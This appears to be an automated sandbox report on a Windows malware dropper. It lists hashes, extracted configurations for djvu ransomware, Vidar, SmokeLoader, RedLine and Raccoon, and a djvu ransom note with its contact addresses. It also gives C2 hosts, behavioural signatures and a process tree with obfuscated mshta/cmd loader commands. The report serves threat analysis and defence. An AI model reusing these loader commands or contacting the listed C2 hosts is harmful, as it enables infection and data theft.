Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
1801s -
max time network
1803s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22-10-2021 17:40
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Family
djvu
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-pk3SGFlmek
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0341gSd743dw5bW9VHoXUsivc5FZ0yEV7QenO6CpYtFwFaxwujj
URLs
https://we.tl/t-pk3SGFlmek
Extracted
Family
vidar
Version
41.5
Botnet
903
C2
https://mas.to/@xeroxxx
Attributes
-
profile_id
903
Extracted
Family
smokeloader
Version
2020
C2
http://gejajoo7.top/
http://sysaheu9.top/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.5
Botnet
937
C2
https://mas.to/@xeroxxx
Attributes
-
profile_id
937
Extracted
Family
redline
C2
205.185.119.191:60857
Extracted
Family
vidar
Version
41.5
Botnet
921
C2
https://mas.to/@xeroxxx
Attributes
-
profile_id
921
Extracted
Family
raccoon
Botnet
7c9b4504a63ed23664e38808e65948379b790395
Attributes
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
rc4.plain
rc4.plain
Extracted
Family
vidar
Version
41.5
Botnet
933
C2
https://mas.to/@xeroxxx
Attributes
-
profile_id
933
Extracted
Family
djvu
C2
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 9 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 8 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 38 IoCs
-
Drops file in Program Files directory 19 IoCs
-
Drops file in Windows directory 21 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
-
NSIS installer 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 7 IoCs
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 10 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 64 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: MapViewOfSection 29 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f6⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp" /SL5="$F01CC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp" /SL5="$502EE,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe" ss18⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart8⤵
- Executes dropped EXE
-
C:\436dd42121a8482a2d6b8730\Setup.exeC:\436dd42121a8482a2d6b8730\\Setup.exe /q /norestart /x86 /x64 /web9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss18⤵
- Executes dropped EXE
- Checks computer location settings
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30007⤵
- Runs ping.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\customer7.exe"C:\Users\Admin\AppData\Local\Temp\customer7.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6645⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 7085⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6925⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 8565⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 9525⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11885⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11605⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 12045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\sfx.exe"C:\Users\Admin\AppData\Local\Temp\sfx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LzmwAqmV.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp"C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /SL5="$40110,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe"C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffc0c1bdec0,0x7ffc0c1bded0,0x7ffc0c1bdee05⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1696 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1984 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:15⤵
- Checks computer location settings
-
-
